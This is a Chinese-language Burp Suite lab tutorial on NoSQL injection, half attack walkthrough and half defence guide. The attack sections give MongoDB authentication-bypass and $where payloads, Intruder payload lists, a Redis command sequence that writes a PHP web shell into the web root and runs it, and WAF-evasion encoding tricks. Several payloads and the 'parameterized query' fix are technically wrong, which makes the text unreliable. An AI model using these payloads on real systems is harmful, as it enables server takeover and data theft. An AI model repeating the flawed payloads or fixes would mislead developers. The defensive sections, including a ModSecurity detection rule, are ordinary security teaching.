Burp靶场实战：NoSQL注入漏洞深度解析与防御指南

摘要

NoSQL注入作为新型数据库安全威胁，正逐渐成为攻击者突破应用防护的核心手段。本文以Burp Suite靶场为实验环境，系统解析NoSQL注入的攻击原理、靶场实战流程、漏洞利用技巧及防御策略。通过MongoDB与Redis注入案例，结合Burp Suite的拦截、重放、编码转换功能，揭示攻击者如何绕过传统防护机制。同时提出参数化查询、最小权限原则、WAF防护等综合防御方案，为开发者提供从攻击模拟到安全加固的全流程指导。

一、NoSQL注入：被忽视的数据库安全威胁

1.1 NoSQL数据库的普及与安全隐忧

随着微服务架构的兴起，MongoDB、Redis、Cassandra等非关系型数据库因高扩展性和灵活数据模型被广泛应用。然而，NoSQL的查询语法多样性（如JSON、BSON、键值对）和动态查询特性，使其面临独特的注入风险。据OWASP 2023报告，NoSQL注入漏洞在Web应用攻击中占比已达12%，且增长率超过传统SQL注入。

1.2 NoSQL注入的核心原理

NoSQL注入的本质是攻击者通过构造恶意查询，修改数据库操作逻辑。其关键点在于：

• 查询构造方式：如MongoDB的db.collection.find({user: input})，若input未过滤，可注入{$ne: null}等操作符。
• 动态语言特性：Node.js、Python等语言中，对象属性可直接拼接为查询条件，缺乏预编译机制。
• 多协议支持：REST API、WebSocket等接口可能直接传递JSON参数，增加攻击面。

二、Burp靶场环境搭建与工具配置

2.1 靶场选择与部署

推荐使用DVWA-NoSQL分支或自行搭建含NoSQL漏洞的靶机。以MongoDB为例，部署包含以下路由的Node.js应用：

app.post('/login', async (req, res) => {
  const { username, password } = req.body;
  const user = await db.collection('users').findOne({
    username: username,
    password: password
  });
  // 漏洞点：直接拼接用户输入
});

2.2 Burp Suite核心功能配置

• Proxy拦截：在”Proxy”→”Options”中设置拦截规则，捕获所有POST /login请求。
• Intruder模块：配置Payload位置为username和password字段，选择”Sniper”或”Pitchfork”攻击模式。
• Encoder转换：对特殊字符（如$、{）进行URL编码或Unicode转义。
• Repeater调试：手动修改请求体，观察数据库响应差异。

三、靶场实战：NoSQL注入攻击全流程

3.1 MongoDB注入：逻辑绕过与数据泄露

攻击场景：登录接口存在注入漏洞，攻击者尝试绕过身份验证。

步骤1：信息收集

• 使用Burp的”Proxy”→”History”分析响应，发现错误信息包含MongoDB驱动版本（如Mongoose 6.0）。
• 通过db.version()猜测数据库类型（MongoDB默认返回版本信息）。

步骤2：构造注入Payload

• 基础注入：在username字段输入admin，password输入{"$ne": null}，触发永远为真的查询。

  {"username":"admin","password":{"$ne":null}}

• 联合查询注入：利用$or操作符同时匹配多个条件：

  {"username":"admin","password":{"$or":[{"$eq":"123"},{"$exists":false}]}}

• 数据提取：通过$where注入执行JavaScript代码（需开启JavaScript引擎）：

  {"username":"admin","password":{"$where":"this.password.length < 8"}}

步骤3：Burp自动化攻击

• 在Intruder中设置Payload集：
  • Position 1: username固定为admin
  • Position 2: password使用自定义字典（包含{"$ne":null}、{"$gt":""}等）
• 启动攻击后，筛选状态码为200且响应包含敏感数据的请求。

3.2 Redis注入：未授权访问与命令执行

攻击场景：Redis配置错误导致未授权访问，攻击者通过Burp构造特殊请求。

步骤1：探测服务

• 使用Burp的”Scanner”模块扫描目标端口，发现6379端口开放。
• 通过”Repeater”发送INFO命令，确认Redis版本。

步骤2：注入恶意数据

• 构造包含Webshell的键值对：

  SET payload "\n\n<?php system($_GET['cmd']);?>\n\n"
  CONFIG SET dir /var/www/html/
  CONFIG SET dbfilename shell.php
  SAVE

• 使用Burp的”Copy as Fetch”生成cURL命令，通过终端执行。

步骤3：验证结果

• 访问http://target/shell.php?cmd=id，确认命令执行成功。

四、防御策略：从代码到运维的全链路防护

4.1 代码层防御

• 参数化查询：使用MongoDB官方驱动的filter参数：

  db.collection('users').findOne({
    username: req.body.username,
    password: req.body.password
  }); // 错误示例（仍存在风险）
  // 正确做法：使用Schema验证 + 参数化

• 输入验证：对JSON字段进行类型检查（如typeof password === 'string'）。
• 最小权限原则：数据库用户仅授予必要权限（如仅读权限）。

4.2 网络层防御

• WAF配置：在ModSecurity中添加规则拦截含$、{的JSON字段（需平衡误报率）。

  SecRule ARGS_JSON|ARGS_POST_JSON "@rx \$\w+" "id:'999',phase:2,block,msg:'Potential NoSQL Injection'"

• API网关过滤：使用Kong或AWS API Gateway限制JSON字段长度和字符集。

4.3 运维层防御

• 数据库审计：启用MongoDB的auditLog功能，记录所有修改操作。

  # /etc/mongod.conf
  auditLog:
    destination: file
    format: JSON
    path: /var/log/mongodb/audit.json

• 定期更新：及时升级MongoDB至最新版本（如5.0+修复了部分注入漏洞）。

五、进阶技巧：绕过常见防护机制

5.1 绕过WAF的编码技巧

• Unicode转义：将$ne替换为\u0024ne。
• 十六进制编码：对JSON键名进行编码（如\x75\x73\x65\x72\x6e\x61\x6d\x65）。
• 注释混淆：在Payload中插入/**/或//（部分解析器会忽略）。

5.2 盲注利用技巧

当无直接错误回显时，可通过以下方式推断数据：

• 时间延迟注入：利用$where和db.sleep()（需MongoDB支持）：

  {"username":"admin","password":{"$where":"db.sleep(5000)"}}

• 布尔盲注：根据响应时间或内容差异判断条件是否成立。

六、总结与建议

NoSQL注入的防御需结合代码规范、工具防护和运维监控。建议开发者：

1. 在Burp靶场中定期演练注入攻击，熟悉常见Payload。
2. 采用ORM框架（如Mongoose）的严格模式，避免直接拼接查询。
3. 部署RASP（运行时应用自我保护）工具，实时拦截恶意操作。
4. 关注CVE数据库，及时修复NoSQL数据库漏洞。

通过本文的实战案例和防御方案，开发者可系统掌握NoSQL注入的攻防技术，构建更安全的数据库应用环境。